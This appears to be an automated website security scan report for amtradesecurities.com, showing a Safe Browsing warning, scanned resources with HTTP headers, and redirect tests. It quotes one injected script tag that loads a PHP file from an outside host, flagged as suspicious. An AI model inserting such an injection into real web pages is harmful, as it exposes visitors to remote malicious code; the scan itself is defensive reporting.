Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amtradesecurities.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://amtradesecurities.com/ | 200 OK Content-Length: 4911 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.bymarlon.nl/templates/beez/vhqf9fgg.php?id=2300604"></script> | ||
http://amtradesecurities.com/Scripts/AC_RunActiveContent.js | HTTP/1.1 302 Found Connection: close Date: Sun, 11 Jan 2015 09:12:07 GMT Location: https://supremecenter21.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
https://supremecenter21.com/404/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:12:08 GMT Location: http://us.cloudlogin.co/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://us.cloudlogin.co/404/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:12:09 GMT Location: https://us.cloudlogin.co/404/ Server: Apache Vary: Accept-Encoding Content-Length: 303 Content-Type: text/html; charset=iso-8859-1 | clean |
https://us.cloudlogin.co/404/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 11 Jan 2015 09:12:09 GMT Pragma: no-cache Location: /login/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: WHCP=vo652jdule971c3lcsfcht7hv5; path=/ X-Powered-By: PHP/5.4.35-0+deb7u2 | clean |
https://us.cloudlogin.co/login/ | 200 OK Content-Length: 6444 Content-Type: text/html | clean |
https://us.cloudlogin.co/js/jses.min.js?v=1415787044 | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
http://amtradesecurities.com/js/jquery_plugins/jquery-fonteffect-1.0.0.min.js | HTTP/1.1 302 Found Connection: close Date: Sun, 11 Jan 2015 09:12:14 GMT Location: https://supremecenter21.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
http://supremecenter21.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:12:15 GMT Location: http://us.cloudlogin.co/test404page.js Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://us.cloudlogin.co/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 09:12:15 GMT Location: https://us.cloudlogin.co/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 | clean |
https://us.cloudlogin.co/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 11 Jan 2015 09:12:16 GMT Pragma: no-cache Location: /login/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: WHCP=i1o459leckt9mhlhovb7630na3; path=/ X-Powered-By: PHP/5.4.35-0+deb7u2 | clean |
http://amtradesecurities.com/js/video-js/video.min.js | HTTP/1.1 302 Found Connection: close Date: Sun, 11 Jan 2015 09:12:16 GMT Location: https://supremecenter21.com/404/ Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: Accept-Encoding Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.corecounter.net/counter.php?user=59 | 200 OK Content-Length: 482 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amtradesecurities.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 09:12:07 GMT
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 4911
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...4911 bytes of data.
GET / HTTP/1.1
Host: amtradesecurities.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 09:12:07 GMT
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 4911
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...4911 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: amtradesecurities.com
Referer: http://www.google.com/search?q=amtradesecurities.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amtradesecurities.com
Referer: http://www.google.com/search?q=amtradesecurities.com
Result:
The result is similar to the first query. There are no suspicious redirects found.